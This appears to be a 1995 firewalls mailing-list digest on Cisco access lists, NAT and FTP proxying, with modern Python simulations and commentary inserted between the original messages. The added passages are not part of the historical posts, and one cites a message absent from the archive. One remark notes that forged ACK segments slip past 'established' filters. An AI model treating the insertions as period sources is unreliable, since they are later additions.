> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25
>
> SMTP works but with this config I tried telnet and it also works.
> this is not acceptable and if I remove the established line ->
> nothing works.
> the interface config:
>
> interface Ethernet0
> ip address 2.2.3.2 'some adr mask'
> ip access-group 102 out
>

this is a grateful mailing list. it was the first problem I posted a question about and I got many very useful answers.
The problem is solved like this: interface Ethernet0 ip address 2.2.3.2 'some adr mask' ip access-group 102 out ip access-group 101 in where access-list 101 is exactly like 102 but with swapped dest & source addrs, so now SMTP is allowed in and out and nothing else. Many, many thanks to all answerers, especially to: Colin Campbell, Bill Bunting, Petter Häggman, Paul Crossley :-) iLiAS ---------------------------------------------------------------------- Ilias Liakopoulos | Email: ilias@telecom.at Spardat AG & Co KG | Tel: 0043/1/74045-4762 Fax -5704 Geiselbergstr. 21-25 | WWW: http://pina2.telecom.at/~lia 1110-Vienna | nic-hdl: IL7-RIPE Austria | Europe | ---------------------------------------------------------------------- From firewalls-owner Fri Oct 6 10:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04451 for firewalls-outgoing; Fri, 6 Oct 1995 09:36:27 -0700 Received: from noc4.dccs.upenn.edu (NOC4.DCCS.UPENN.EDU [128.91.254.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA04442 for ; Fri, 6 Oct 1995 09:36:23 -0700 Received: from JAKE.DCCS.UPENN.EDU by noc4.dccs.upenn.edu id AA11941; Fri, 6 Oct 95 12:34:46 -0400 Date: Fri, 6 Oct 95 12:34:46 -0400 Message-Id: <9510061634.AA11941@noc4.dccs.upenn.edu> X-Sender: tex@pobox.upenn.edu Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: lasseh@microfront.se, Firewalls@greatcircle.com From: boone@isc.upenn.edu (Jon 'tex' Boone) Subject: Re: Address Translators X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:05 AM 10/5/95 +0200, lasseh@microfront.se wrote: >A commercial NAT product is Private Internet Exchange from >Network Translation Inc. Any positive things I say about it on >this list would be biased, since we distribute it in Sweden, but >I'll say this: It's a helluva product! > >NTI have a Web site at www.translation.com. > >Lars.
> >PS >Any thoughts regarding weaknesses or strengths in this kind of >solution are welcome, since the NAT approach is fairly new and >needs to be discussed. >DS Lars, et al.: I'm glad that you brought this up. I have done an evaluation of this product and have some criticisms of how it works. 1) The version I looked at did not support MTU discovery [according to the guy who wrote the code.] This meant overall poor performance since everywhere that I was trying to go to through the PIX was "off-net" and required a 512-byte MTU. :-( 2) The box will map your address into a new range dynamically and does so well - however, you must already be numbered in a reserved range if you want to have "global" connectivity. For example, if you have already set up your network [net 20.0.0.0, say] and you want to use this box to dynamically map you into your provider's space, you need to renumber into the reserved net 10.0.0.0 space if you want to be able to reach the site that is going to be legitimately using net 20.0.0.0. This should come as no surprise to anyone [re-numbering would normally be required if you are set up for a network which someone else has already registered for and is routing on the Internet]. However, with a clever hack, you could have this PIX dynamically map the legitimate net 20.0.0.0 hosts into net 10.0.0.0 when talking to the "internal" side and map the non-legitimate net 20.0.0.0 into net 10.0.0.0 on the "external" side. The DNS would have to be hacked to do the same as well. I have spoken with the developers about this idea and they said they would think about it - although they didn't seem that excited by the idea. [The one guy I spoke to thought that you ought to renumber into net 10.0.0.0 and just be done with it - but that isn't always an option.] If this hack could be worked out, then I think that this kind of box would be very popular - especially as the need for CIDR-related renumbering grows.
On the positive side, this box is very easy to configure and requires little more than power and Ethernet connections to be up and running. Total installation time [including reading the manual] was about 10 minutes. ___________________________________________________________________ Jon 'tex' Boone email: tex@isc.upenn.edu Operations Engineer work: (215) 898 - 2477 ISC - DCCS fax: University of Pennsylvania From firewalls-owner Fri Oct 6 10:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05318 for firewalls-outgoing; Fri, 6 Oct 1995 10:05:46 -0700 Received: from charon.ppco.com (ppco.com [138.32.15.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA05311 for ; Fri, 6 Oct 1995 10:05:20 -0700 From: bcsolom@bvemx.ppco.com Received: from bvemx.ppco.com by charon.ppco.com with SMTP id AA06306 (InterLock SMTP Gateway 3.0 for ); Fri, 6 Oct 1995 11:52:43 -0500 X400-Originator: bcsolom@bvemx.ppco.com X400-Recipients: firewalls@GreatCircle.COM X400-Mts-Identifier: [/ADMD=ATTMAIL/C=US/;0011200001408301000004] X400-Content-Type: P2-1988 (22) Priority: Urgent Message-Id: <0011200001408301000004*@MHS> To: "firewalls(a)GreatCircle.COM" Subject: VRML through a Proxy Date: Fri, 6 Oct 1995 11:49:23 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody successfully used VRML (Virtual Reality Markup Language) through an Application based Proxy firewall? If so, what was the client VRML viewer, and what was the firewall product?
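The cisco access-list exchange earlier in this digest (Ilias Liakopoulos's question and the fix he was given) comes down to what the IOS keyword `established` actually matches. What follows is an added example, not code from that thread or from Cisco: a small Python model of extended access-list evaluation (wildcard masks, `eq`, `established` as "ACK or RST bit set", implicit deny at the end of every list) run against both configurations. The direction model assumes Ethernet0 (2.2.3.2) faces the 2.2.3.0/24 segment, so traffic toward 2.2.3.4 is "out" and traffic from it is "in"; the ephemeral port 1025 on the returning SYN/ACK is constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    ack: bool = False   # IOS 'established' matches a TCP segment with ACK or RST set
    rst: bool = False


@dataclass
class Ace:
    action: str         # "permit" or "deny"
    src: str
    src_wild: str
    dst: str
    dst_wild: str
    eq: Optional[int] = None
    established: bool = False


def wildcard_match(addr: str, base: str, wild: str) -> bool:
    """Cisco wildcard mask: a 1 bit in the mask means 'don't care'."""
    a, b, w = (int(ipaddress.IPv4Address(x)) for x in (addr, base, wild))
    care = ~w & 0xFFFFFFFF
    return (a & care) == (b & care)


def parse_ace(line: str) -> Ace:
    """Parse 'access-list N permit|deny tcp SRC SWILD DST DWILD [eq PORT] [established]'."""
    tok = line.split()
    if tok[0] != "access-list" or tok[2] not in ("permit", "deny") or tok[3] != "tcp":
        raise ValueError(f"unsupported entry: {line}")
    ace = Ace(tok[2], tok[4], tok[5], tok[6], tok[7])
    rest = tok[8:]
    while rest:
        kw = rest.pop(0)
        if kw == "eq":
            ace.eq = int(rest.pop(0))
        elif kw == "established":
            ace.established = True
        else:
            raise ValueError(f"unsupported keyword: {kw}")
    return ace


def evaluate(acl: List[Ace], pkt: Packet) -> str:
    """First matching entry wins; every IOS access list ends in an implicit deny."""
    for ace in acl:
        if not wildcard_match(pkt.src, ace.src, ace.src_wild):
            continue
        if not wildcard_match(pkt.dst, ace.dst, ace.dst_wild):
            continue
        if ace.eq is not None and pkt.dport != ace.eq:
            continue
        if ace.established and not (pkt.ack or pkt.rst):
            continue
        return ace.action
    return "deny"


# The original configuration from the thread: list 102 applied outbound only.
ACL_102 = [parse_ace(l) for l in (
    "access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established",
    "access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25",
)]
# The fix: the same list with source and destination swapped, applied inbound.
ACL_101 = [parse_ace(l) for l in (
    "access-list 101 permit tcp 2.2.3.4 0.0.0.0 1.2.3.4 0.0.0.0 established",
    "access-list 101 permit tcp 2.2.3.4 0.0.0.0 1.2.3.4 0.0.0.0 eq 25",
)]


def forwards(acl_in: Optional[List[Ace]], acl_out: Optional[List[Ace]], pkt: Packet) -> bool:
    """Ethernet0 faces 2.2.3.0/24 (assumption): a packet addressed to 2.2.3.x leaves
    through it ('out'), one coming from 2.2.3.x enters through it ('in').
    A direction with no access-group applied is unfiltered."""
    outbound = wildcard_match(pkt.dst, "2.2.3.0", "0.0.0.255")
    acl = acl_out if outbound else acl_in
    return acl is None or evaluate(acl, pkt) == "permit"


def session_allowed(acl_in, acl_out, client: str, server: str, port: int) -> bool:
    """A TCP session needs its SYN forwarded one way and the SYN/ACK back the other;
    'established' can only ever match the second of those."""
    syn = Packet(client, server, port)                 # no ACK yet
    synack = Packet(server, client, 1025, ack=True)     # 1025: the client's ephemeral port (constructed)
    return forwards(acl_in, acl_out, syn) and forwards(acl_in, acl_out, synack)


if __name__ == "__main__":
    print("telnet 2.2.3.4 -> 1.2.3.4, list 102 out only:", session_allowed(None, ACL_102, "2.2.3.4", "1.2.3.4", 23))
    print("telnet 2.2.3.4 -> 1.2.3.4, 101 in + 102 out :", session_allowed(ACL_101, ACL_102, "2.2.3.4", "1.2.3.4", 23))
    print("SMTP   1.2.3.4 -> 2.2.3.4, 101 in + 102 out :", session_allowed(ACL_101, ACL_102, "1.2.3.4", "2.2.3.4", 25))
```

With list 102 alone, telnet from 2.2.3.4 to the outside works because the SYN enters Ethernet0 where nothing is applied and the returning SYN/ACK carries the ACK bit, which is all `established` checks. Adding the mirrored list 101 inbound drops that SYN while still passing SMTP in either direction. The caveat the simulation also makes visible: `established` trusts flag bits, so a single forged segment with ACK set and destination port 23 still gets through list 102 to 2.2.3.4; this style of filter cannot tell a reply from a crafted probe, which is what stateful inspection was later introduced to fix.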
From firewalls-owner Fri Oct 6 11:05:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06455 for firewalls-outgoing; Fri, 6 Oct 1995 10:49:31 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA06443 for ; Fri, 6 Oct 1995 10:49:28 -0700 Received: by gw.home.vix.com id AA09808; Fri, 6 Oct 95 10:48:03 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA28636; Fri, 6 Oct 1995 10:48:03 -0700 Message-Id: <9510061748.AA28636@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: FTP FW solution In-Reply-To: Your message of "Fri, 06 Oct 1995 10:59:47 CDT." Date: Fri, 06 Oct 1995 10:48:02 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > So 'NAT does FTP proxying' and this 'without searching for PORT verbs in user > data' ? > > Not right. The FTP proxy, of course, will look at user data. A proxy > *IS* Layering Violation #1. An FTP proxy speaks the FTP protocol. Rather than modify protocol elements it translates entire transactions (which can have multiple protocol-level verb/response exchanges.) This is a violation in the sense Clark meant in his end-to-end paper way back when, but it's not the same as pattern matching in a stream and making alterations to suit the environment. The fact that I don't like it doesn't mean it won't work or that it's "wrong." But I feel pretty strongly that routers ought to route, and that asking them to modify anything deeper than the transport level headers is just bad news. 
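As an added illustration of the point Darren Reed and Paul Vixie are making about patching PORT in the kernel versus running ftp-gw (this is not code from either of them, nor from the Linux 1.3 masquerading code they refer to): the Python below parses the FTP PORT verb, performs the in-stream rewrite the way a NAT must, and records the state that rewrite forces on it, beside the proxy alternative that simply speaks a new PORT verb on its own connection. The addresses 198.51.100.7 and 10.0.0.5, port 40000 and the sample PORT line are constructed.

```python
import re
import socket

PORT_RE = re.compile(rb"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\r\n$")


def parse_port(line: bytes):
    """Decode 'PORT h1,h2,h3,h4,p1,p2\\r\\n' into (ip, port); None if it is not a whole PORT line."""
    m = PORT_RE.match(line)
    if m is None:
        return None
    fields = [int(x) for x in m.groups()]
    if any(v > 255 for v in fields):
        return None
    return ".".join(str(v) for v in fields[:4]), fields[4] * 256 + fields[5]


def format_port(ip: str, port: int) -> bytes:
    octets = ip.split(".") + [str(port >> 8), str(port & 0xFF)]
    return b"PORT " + ",".join(octets).encode("ascii") + b"\r\n"


class NatPortRewriter:
    """Rewrites PORT verbs inside the control stream, as a kernel NAT does.

    The rewritten verb is usually a different length, so the translator has to
    carry a per-connection sequence delta and patch SEQ on every later client
    segment and ACK on every server segment, plus the data-channel mapping.
    That is the state the in-stream approach needs even when it has no disk."""

    def __init__(self, external_ip: str, first_port: int = 40000):
        self.external_ip = external_ip
        self.next_port = first_port
        self.seq_delta = 0       # bytes added (or removed) so far on this control connection
        self.data_map = {}       # (external ip, port) -> (internal ip, port) for the data channel

    def rewrite(self, segment: bytes) -> bytes:
        target = parse_port(segment)
        if target is None:       # not a PORT verb, or a PORT verb split across segments: passes untouched
            return segment
        ext_port, self.next_port = self.next_port, self.next_port + 1
        self.data_map[(self.external_ip, ext_port)] = target
        out = format_port(self.external_ip, ext_port)
        self.seq_delta += len(out) - len(segment)
        return out

    def fix_client_seq(self, seq: int) -> int:
        """SEQ the server must see on a client segment sent after the rewrite."""
        return (seq + self.seq_delta) & 0xFFFFFFFF

    def fix_server_ack(self, ack: int) -> int:
        """ACK the client must see on a server segment."""
        return (ack - self.seq_delta) & 0xFFFFFFFF


def proxy_port_command(client_line: bytes, proxy_ip: str):
    """What an application proxy (ftp-gw style) does instead: it owns a separate TCP
    connection to the server, so it opens its own data listener and speaks a fresh
    PORT verb there. Nothing in the client's byte stream is patched and no sequence
    delta exists. Returns (verb sent to the server, where the client wants its data)."""
    target = parse_port(client_line)
    if target is None:
        raise ValueError("not a complete PORT command")
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # kernel picks a free port; loopback keeps the demo offline
    listener.listen(1)
    port = listener.getsockname()[1]
    listener.close()                  # a real proxy keeps this open until the server connects
    return format_port(proxy_ip, port), target
```

Two things to notice when running it. The rewrite of `PORT 10,0,0,5,4,1` into `PORT 198,51,100,7,156,64` grows the segment by seven bytes, and from then on every sequence and acknowledgement number on that connection has to be adjusted, which is exactly the "not stateless" point Vixie makes further down. And a PORT verb that arrives split across two segments (`PORT 10,0,0,5,` in one, the rest in the next) passes the naive rewriter untouched, leaking the internal address and breaking the transfer, which is the kind of thing a proxy that reads whole protocol lines never has to think about.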
From firewalls-owner Fri Oct 6 11:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06944 for firewalls-outgoing; Fri, 6 Oct 1995 11:02:41 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06937 for ; Fri, 6 Oct 1995 11:02:36 -0700 Received: by gw.home.vix.com id AA10696; Fri, 6 Oct 95 11:01:13 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA28453; Fri, 6 Oct 1995 11:01:13 -0700 Message-Id: <9510061801.AA28453@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff Date: Fri, 06 Oct 1995 11:01:13 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In private e-mail, someone quoted me and then asked a question which I have decided to answer here: > > The trick is to use an FTP proxy without the client having to know that > > it's talking to an FTP proxy. With a simple DNS trick and a complicated > > FTP proxy, you can make these ends meet. > > Could you explain this in a little more detail? Assume an RFC 1597 net which cannot exchange packets with the outside world. Everything a host on the internal net does, it does with other internal hosts or with some kind of fancy border gateway. This includes name service. Assume that the name server is smart enough to answer "creatively" when asked certain questions by internal hosts about external hosts. The border gateway makes the assumption that the time between asking for a remote host's address and attempting to connect to that address will be relatively short, and that these events are for the most part paired (other than as provided for by DNS caching on intermediate internal name servers.) 
Assume that the addresses given back by our "creative" border name server will refer to internal addresses (probably using alias interfaces) on some border machine, and that border machine has the "socket" command available, and that DNS replies can be made to coincide with execution of "socket" commands. Assume that for protocols which do not contain addresses within them, such as telnet, the above is all that's required. In other cases, like SMTP where the internal hostnames may not be mappable by an external SMTP server, an application layer gateway (like sendmail running as a mail relay) will be used. In the case of FTP, the application layer gateway is fired up by the creative DNS server and it is given the desired remote host name/address mappings needed to complete the transaction even though the internal FTP client's TCP connection has "ended" at the border. Some of the assumptions, especially the tight binding between DNS replies and remote server identities, are unpleasantly constraining. I observe that this situation is only encountered by clients who don't know about explicit proxies, and as such, most of the user population won't have to suffer with it. Older and dumber clients _do_ work, though. And the benefits of using an RFC 1597 network are just extreme: no renumbering when switching carriers; multihoming for free; absolute packet-level security no matter who misconfigures what.
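A model of the scheme Vixie sketches above, added here as an example (it is not his code and not anything he published): a border name server that hands internal clients an alias address from a pool on the border host and remembers which outside host each alias stands for, and a border gateway that, when a client connects to alias:port, looks the binding up and either relays bytes "socket"-style or hands the real host to an application gateway. The host names, the 203.0.113.x outside addresses, the 10.255.0.x alias pool, the 30-second binding lifetime and the port-to-gateway table are all assumptions of this example.

```python
from typing import Dict, List, Optional, Tuple

# Constructed data: the outside world as the border name server knows it.
EXTERNAL_DNS = {
    "ftp.example.net": "203.0.113.10",
    "www.example.org": "203.0.113.20",
    "mail.example.com": "203.0.113.30",
}


class CreativeResolver:
    """Border name server. Internal clients asking about an outside host get an
    alias address on the border host; the resolver remembers which outside host
    that alias currently stands for. The answer is only useful while the binding lives,
    which is the tight DNS-reply-to-connection coupling the post calls constraining."""

    def __init__(self, aliases: List[str], external_dns: Dict[str, str], ttl: int = 30):
        self.free = list(aliases)
        self.external_dns = external_dns
        self.ttl = ttl
        self.bindings: Dict[str, Tuple[str, str, int]] = {}   # alias -> (name, outside ip, expires)

    def expire(self, now: int) -> None:
        for alias in [a for a, (_, _, exp) in self.bindings.items() if exp <= now]:
            del self.bindings[alias]
            self.free.append(alias)          # alias goes back to the pool for re-use

    def resolve(self, name: str, now: int) -> Optional[str]:
        """Return the alias address to answer with, or None (NXDOMAIN or pool exhausted)."""
        self.expire(now)
        for alias, (bound, ip, _) in self.bindings.items():
            if bound == name:                # same host asked for again: keep the alias, refresh the binding
                self.bindings[alias] = (bound, ip, now + self.ttl)
                return alias
        if name not in self.external_dns or not self.free:
            return None
        alias = self.free.pop(0)
        self.bindings[alias] = (name, self.external_dns[name], now + self.ttl)
        return alias


class BorderGateway:
    """The border host. A connection from an internal client to alias:port is
    resolved through the bindings to decide which outside host was meant and how
    to carry it: a plain byte relay for address-free protocols, an application
    gateway for ones that embed names or addresses (FTP, SMTP)."""

    APP_GATEWAYS = {21: "ftp-gw", 25: "smtp-relay"}   # assumed table for this example

    def __init__(self, resolver: CreativeResolver):
        self.resolver = resolver

    def connect(self, alias: str, dport: int, now: int):
        self.resolver.expire(now)
        binding = self.resolver.bindings.get(alias)
        if binding is None:                  # answer cached past its lifetime, or never ours: refuse
            return ("refuse", None)
        name, outside_ip, _ = binding
        if dport in self.APP_GATEWAYS:       # hand the real host name/address to the application gateway
            return (self.APP_GATEWAYS[dport], (name, outside_ip))
        return ("plug", (outside_ip, dport))  # 'socket'-style relay for telnet and the like
```

The two failure modes the post alludes to fall straight out of the model: with two aliases in the pool the third outside host cannot be answered at all, and a client that connects from a stale cached answer after the binding has expired is refused (or, worse, if the alias has since been re-bound, lands on the wrong outside host, which is why the resolver keeps TTLs short and refreshes the binding on repeat queries).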
From firewalls-owner Fri Oct 6 11:30:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07338 for firewalls-outgoing; Fri, 6 Oct 1995 11:21:52 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA07331 for ; Fri, 6 Oct 1995 11:21:48 -0700 Received: by gw.home.vix.com id AA12384; Fri, 6 Oct 95 11:20:26 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA28505; Fri, 6 Oct 1995 11:20:25 -0700 Message-Id: <9510061820.AA28505@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Thu, 05 Oct 1995 11:05:43 +0200." Date: Fri, 06 Oct 1995 11:20:25 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > OK I get it, IBM NAT box has application level proxies inside instead of > packet-per-packet address translation. (BTW, Do you know where I can > find info about this IBM box. Quick search on IBM Web site didn't get me > anything) IBM, like DEC and other large companies, makes it just about impossible to buy anything from them unless it's something carried by your local computer store. I've never understood how American industry has lasted so long. I honestly have no idea how you'd go about learning more details about this; perhaps ANS is still reselling them and their web page knows about it? > Let me try to summarize this subject a bit. There seems to be > (at least) 2 different techniques for address translation: > > * Translate IP addresses on each IP packet that goes through, otherwise > let packets go through unmodified. Handling FTP requires some dirty > tricks like modifying data inside IP packets that contain FTP PORT > commands. Invisible to users. > > * Use application level proxies. This can be made invisible to users > by using transparent proxies. All true to the best of my understanding.
> Packet-by-packet address translation may be dirty in some sense, > but on the other hand it doesn't require its own process on each connection and > requires just a little state information. It can be implemented > on a standalone box with no disks and limited main memory (like a router). I think the perceived and widely publicized IPv4 address will lead to all kinds of layer-violating (RFC 1597) and aesthetically-disastrous (IPv6) solutions. Market pressure is going to cause more NAT-like solutions to fall out. You're right that doing it statelessly is better _when_possible_; I'd just like to note that modifying FTP data in-stream is not stateless even if a kernel-only implementation would be diskless. From firewalls-owner Fri Oct 6 12:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08145 for firewalls-outgoing; Fri, 6 Oct 1995 11:49:02 -0700 Received: from prometheus.microchip.com (PROMETHEUS.MICROCHIP.COM [198.175.253.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08138 for ; Fri, 6 Oct 1995 11:48:59 -0700 Received: (from daemon@localhost) by prometheus.microchip.com (8.6.12/8.6.9) id LAA11033 for ; Fri, 6 Oct 1995 11:53:03 -0700 Received: from pegasus.microchip.com(199.170.150.38) by prometheus.microchip.com via smap (V1.3) id sma011031; Fri Oct 6 11:52:33 1995 Received: from localhost (localhost.Microchip.COM [127.0.0.1]) by pegasus.Microchip.COM (8.7/8.7) with ESMTP id LAA20120; Fri, 6 Oct 1995 11:38:49 -0700 (MST) Message-Id: <199510061838.LAA20120@pegasus.Microchip.COM> To: firewalls@greatcircle.com, fwtk-list@tis.com cc: meyerd@post.med.uni-marburg.de, Donald.J.Smith@cdev.com Subject: Re: http-gw & tis In-reply-to: Your message of "Thu, 05 Oct 1995 20:13:13 MST." <199510060431.VAA19813@miles.greatcircle.com> Date: Fri, 06 Oct 1995 11:38:45 -0700 From: Gustavo Vegas Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "D.A.
Meyer" >Date: Thu, 5 Oct 1995 10:12:43 +0000 >Subject: http-gw on dual-homed gateways >......[text deleted...] >The proxy has to rewrite the URL, and it seems to do it using the >outside interface name/address (gethostname + gethostbyname). When I >change the hostname so that it is connected to the IP address of the >internal interface, my mail-proxy won't work. >Has anybody built a patch which rewrites the address depending on the >interface on which the client request came in? Any other idea? I have had more serious problems than the address/hostname translation. The fix for Lynx/Mosaic to run properly was just to define properly the service_proxy environment variables (where service is one of: http, gopher, ftp, wais). That fixed the hostname translation problem. I am not sure if this is the exact problem you have, though. I am more interested in interfacing http-gw with some form of user auth. in the same style as the other fwtk proxies, like tn-gw. I believe I asked this question on the fwtk list, but I received no answers, not even my own message back. Weird. Cheers, ===========================================+=========================== ****** * *** * * * * *** * * * * * * * * * *** *** * Gustavo Vegas Gustavo.Vegas@Microchip.COM ********** CAD Systems Administrator Microchip Technology Inc.
******* Chandler, Arizona ===========================================+=========================== From firewalls-owner Fri Oct 6 13:00:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10225 for firewalls-outgoing; Fri, 6 Oct 1995 12:44:44 -0700 Received: from netmail2.microsoft.com (netmail2.microsoft.com [131.107.1.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA10210 for ; Fri, 6 Oct 1995 12:44:40 -0700 Received: by netmail2.microsoft.com (5.65/25-eef) id AA23205; Fri, 6 Oct 95 13:46:55 -0700 Received: by netmail2 using fxenixd 1.0 Fri, 06 Oct 95 13:46:54 PDT X-Received: from chopper by xmtp2 with recvsmtp; Fri, 6 Oct 1995 12:12:51 -0700 Received: by CHOPPER with Microsoft Exchange id <01BA93E5.0DC1D2B0@CHOPPER>; Fri, 6 Oct 1995 12:12:49 -0700 Message-Id: From: "Greg King (Exchange)" To: "Firewalls@GreatCircle.COM" Subject: NT browsing in a domain Date: Fri, 6 Oct 1995 12:12:45 -0700 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Msxmtid: xmtp2951006191251RECVSMTP[01.51.00]000000ce-2103 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Since there seems to be some confusion about what is happening in an NT environment for browsing or server announcements, I thought that I would specify what is happening exactly. A computer with a server component will initiate a browser announcement to its local browse master indicating it has the capabilities of receiving client connection requests. This announcement is a frame of 243 bytes, and is an Ethernet broadcast at the MAC level, and a subnet broadcast at the IP level. Browser communications are accomplished using UDP port 138 (NetBIOS Datagram Service), with a standard UDP length of eight bytes. The next 82 bytes are the NBT section of the frame. This contains the local source name, and the destination name of the announcement.
The destination name workgroup <1D> is an announcement to the local browse master for local clients to query and request browse lists from. The next 86 bytes are the SMB (Server Message Block) header. This designates the entire SMB command structure used in this announcement. The thing to note is that the SMB transact file is \MAILSLOT\BROWSE. The final 33 bytes represent the browser portion of the frame. It contains the browser command, Host Announcement, the announcement interval (progresses to 12 minutes), the announced name, and the server type, such as Windows NT Workstation and Windows NT Server. There may be multiple Host Announcement frames broadcast, each specifying the host as a workstation, a server, and as a potential browser. Thanks, Greg King Microsoft Corp. BackOffice Capacity Planning Manager From firewalls-owner Fri Oct 6 13:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10420 for firewalls-outgoing; Fri, 6 Oct 1995 12:55:20 -0700 Received: from bigdipper.iagi.net (bigdipper.iagi.net [204.157.123.29]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA10413 for ; Fri, 6 Oct 1995 12:55:17 -0700 Received: (from daveyb@localhost) by bigdipper.iagi.net (8.6.12/8.6.9) id PAA04327; Fri, 6 Oct 1995 15:57:24 -0400 Date: Fri, 6 Oct 1995 15:57:24 -0400 (EDT) From: "David A. Baldwin" To: firewalls@greatcircle.com cc: "David A. Baldwin" Subject: Re: An interesting dilemma that I could use help with In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, We have a few Xylogics Annex 3 terminal servers at We would like to place a firewall between the Terminal server and the boot/security server. The firewall package that we use is Raptor's firewall product. While I was trying to implement this I ran into a few problems.
The way that we have to use the firewall for this is a bit strange due to the fact that ERPC is a UDP based protocol. We can not use a proxy (which could be bi-directional) because their generic proxyd does not allow UDP to pass through. The way that we implement this is to use what is known as a generic service passer. We set up port 121 on the firewall to pass directly to port 121 on the security/boot server. Thus the terminal server is set up to boot from port 121 on the firewall. The problem with this is that this solution is not bi-directional. There is now no way to use this utility (called na) that resides on the boot/security server to talk to the annex terminal server at port 121. To do this, I would need to set up a rule on the firewall such that all traffic destined to port 121 would go to the terminal server at port 121. That is not possible because this thing does not allow for bi-directional traffic. The way that the na utility works is that it talks to the erpcd on the boot/security server, then the erpcd sends the UDP packet to the terminal server and gets a response or sets a setting to NVRAM. One way to fix this problem might be to get the source of erpcd and make it send info to different ports (i.e. send all info that the na util is sending to port 122 on the firewall and have it redirected to port 121 on the terminal server). I was however hoping that there was an easier solution. I do not mind changing the code myself, but I may not be here forever and if someone were to get a new version of erpcd later and replace my version it might take them a while to figure out what is going on. ------- | ------- | ------- | | |---| | |---| | | | | | | | | | | |---| | |---| | | | | | | | | | | ------- | ------- | ------- Annex | Firewall | Boot Server This is sort of a network diagram of what I have been talking about. 
Thank you for any help, David Baldwin daveyb@iagi.net From firewalls-owner Fri Oct 6 14:01:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11315 for firewalls-outgoing; Fri, 6 Oct 1995 13:31:18 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA11302 for ; Fri, 6 Oct 1995 13:31:14 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id QAA08807; Fri, 6 Oct 1995 16:28:41 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id QAA12950; Fri, 6 Oct 1995 16:28:36 -0400 (EDT) Date: Fri, 6 Oct 1995 16:28:36 -0400 (EDT) Message-Id: <199510062028.QAA12950@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, paul@vix.com Subject: Re: Network Address Translation stuff Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul A Vixie wrote: >> OK I get it, IBM NAT box has application level proxies inside instead of >> pakcet-per-packet address translation. (BTW, Do you know where I can >> find info about this IBM box. Quick search on IBM Web site didn't get me >> anything) > >IBM, like DEC and other large companies, makes it just about impossible to >buy anything from them unless it's something carried by your local computer >store. I've never understood how American industry has lasted so long. I >honestly have no idea how you'd go about learning more details about this; >perhaps ANS is still reselling them and their web page knows about it? Try : http://www.issc1.ibm.com/rsdirect/us/promotions/netsp_promo.htm for the technical details: 